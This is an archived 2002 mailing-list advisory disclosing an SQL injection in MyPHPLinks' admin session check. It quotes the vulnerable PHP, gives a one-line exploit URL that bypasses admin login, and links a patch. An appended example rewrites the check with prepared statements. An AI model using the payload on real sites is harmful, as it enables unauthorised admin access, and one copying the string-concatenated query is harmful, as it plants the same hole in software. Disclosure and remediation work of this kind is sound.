MyPHPLinks (PHP) : SQL Injection

From: Frog Man (leseulfrogat_private)
Date: Sat Dec 14 2002 - 10:41:45 PST


    Information :
    °°°°°°°°°°°°°
    Website : http://www.myphpsoft.net
    Version : ? -> 2.1.9, 2.2.0CVS
    Problem : SQL Injection -> Admin access
    
    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    admin/auth/checksession.php
    ---------------------------------------------------------------
    [...]
    if($idsession!=''){
    $dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, $MyPHPLinksPass);
    if(!$dbs->connect())
      die($dbs->error);
    if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where session='".$idsession."' and timesession > now()"))
      die($dbs->error);
    while($dbs->nextrecord()){
      $loginauth = $dbs->valeur("nb");
    }
    if ($loginauth==0){
      header("Location:$MyPHPLinksAuthPErrDef");exit;
    }else{
      if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'"))
       die($dbs->error);
    }
    }else{
    header("Location:$MyPHPLinksAuthPErrDef");exit;
    }
    ?>
    ---------------------------------------------------------------
    
    
    Exploit :
    °°°°°°°°°
    http://[target]/admin/index.php?idsession='%20OR%20''='
    
    
    Patch :
    °°°°°°°
    A patch can be downloaded from
    http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=m
    
    More details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/MyPhpLinks.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
    
    
    frog-m@n
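
A hardened form of the session check quoted above, as an added example that is not MyPHPLinks code and not the patch the advisory links to. The function name `session_is_valid`, the table name `auth`, the 900-second lifetime and the in-memory SQLite database (standing in for MySQL) are assumptions; it needs PHP 7+ with pdo_sqlite.

```php
<?php
// Added example, not MyPHPLinks code. Table name, lifetime and the sample
// session row are constructed; SQLite in memory stands in for MySQL.

const SESSION_LIFETIME = 900; // assumed stand-in for $MyPHPLinksTLSession

/** Return true only if $idsession names exactly one unexpired session row. */
function session_is_valid(PDO $db, $idsession, int $now): bool
{
    // Request input can arrive as an array or be empty: refuse both early.
    if (!is_string($idsession) || $idsession === '' || strlen($idsession) > 64) {
        return false;
    }
    // Placeholders keep the value out of the SQL text, so quotes in it
    // are compared as data and never parsed as part of the WHERE clause.
    $st = $db->prepare(
        'SELECT COUNT(*) FROM auth WHERE session = :sid AND timesession > :now'
    );
    $st->execute([':sid' => $idsession, ':now' => $now]);
    if ((int) $st->fetchColumn() !== 1) {
        return false;
    }
    // Sliding expiry, as in the original UPDATE, also parameterised.
    $up = $db->prepare('UPDATE auth SET timesession = :exp WHERE session = :sid');
    $up->execute([':exp' => $now + SESSION_LIFETIME, ':sid' => $idsession]);
    return true;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE auth (session TEXT PRIMARY KEY, timesession INTEGER)');

$now  = time();
$good = bin2hex(random_bytes(16)); // constructed 32-character session id
$db->prepare('INSERT INTO auth VALUES (?, ?)')
   ->execute([$good, $now + SESSION_LIFETIME]);

$cases = [
    'valid session'         => $good,
    'advisory idsession'    => "' OR ''='", // value from the Exploit section
    'empty value'           => '',
    'array input'           => ['x'],
];
foreach ($cases as $label => $value) {
    $verdict = session_is_valid($db, $value, $now) ? 'accepted' : 'rejected';
    printf("%-20s %s\n", $label, $verdict);
}
```

Only the constructed valid session is accepted; the string from the Exploit section reaches the database as a bound value and matches no row.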
    
    
    



    This archive was generated by hypermail 2b30 : Sat Dec 14 2002 - 12:54:12 PST